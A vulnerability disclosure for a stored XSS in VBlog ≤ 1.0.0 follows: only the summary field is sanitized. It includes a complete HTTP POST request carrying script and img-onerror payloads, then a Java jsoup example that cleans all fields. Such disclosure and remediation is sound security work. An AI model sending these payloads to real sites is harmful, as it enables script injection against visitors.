BUG_Author: s0l42
Affected Version: VBlog ≤ 1.0.0
Vendor: VBlog GitHub Repository
Software: VBlog
Vulnerability Files:
blogserver/src/main/java/org/sang/service/ArticleService.java
Stored XSS via Post Article:
In blogserver/src/main/java/org/sang/service/ArticleService.java, the function addNewArticle applies stripHtml only to summary; however, the Article class has 3 fields filled by user input.

POST /article/ HTTP/1.1
Host: xxxx
Content-Length: 360
User-Agent: xxxx
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Origin: xxx
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: xxxx
Connection: keep-alive

id=121&title=1&mdContent=%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%0A%0A&htmlContent=%3cscript%3ealert(1)%3b%3c%2fscript%3e%0a%3cp%3e%3cimg%20src%3d%22%22%20onerror%3d%22alert(1)%22%20alt%3d%221.jpg%22%20%2f%3e%3c%2fp%3e%0a&cid=58&state=1&dynamicTags=&

If the request succeeds, an alert pops up when a user visits the article.
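
One way to close the gap described above is to clean every user-filled field before it is stored, instead of only summary. The following is an added example, not VBlog's code: the Article stand-in, the sanitize and plain helpers, and the choice of jsoup (1.14.2 or later, assumed to be on the classpath) are all assumptions made for illustration.

```java
import org.jsoup.Jsoup;
import org.jsoup.safety.Safelist;

// Added example, not VBlog code. Assumes jsoup 1.14.2+ on the classpath.
public class ArticleSanitizerDemo {

    // Hypothetical stand-in for the user-filled fields of an article.
    static class Article {
        String title, mdContent, htmlContent, summary;
    }

    // Plain-text fields: drop all markup; jsoup returns HTML-escaped text.
    static String plain(String s) {
        return s == null ? null : Jsoup.clean(s, Safelist.none());
    }

    // Clean every user-supplied field before storing, not only summary.
    static Article sanitize(Article in) {
        Article out = new Article();
        out.title = plain(in.title);
        out.summary = plain(in.summary);
        // Rendered body: keep allowlisted tags and attributes only. <script>
        // and event-handler attributes such as onerror are not on the list.
        out.htmlContent = in.htmlContent == null ? null
                : Jsoup.clean(in.htmlContent, Safelist.basicWithImages());
        // Markdown source is stored unchanged here (assumption: it is only
        // shown in an editor); it must be encoded wherever it is displayed.
        out.mdContent = in.mdContent;
        return out;
    }

    public static void main(String[] args) {
        // Constructed input: the request body above, URL-decoded.
        Article a = new Article();
        a.title = "1";
        a.mdContent = "<script>alert(1);</script>\n\n";
        a.htmlContent = "<script>alert(1);</script>\n"
                + "<p><img src=\"\" onerror=\"alert(1)\" alt=\"1.jpg\" /></p>\n";
        Article safe = sanitize(a);
        System.out.println("title       = " + safe.title);
        System.out.println("htmlContent = " + safe.htmlContent);
        System.out.println("summary     = " + safe.summary);
    }
}
```

Sanitizing on write protects stored data going forward; articles saved before the fix still need to be cleaned or encoded when they are rendered.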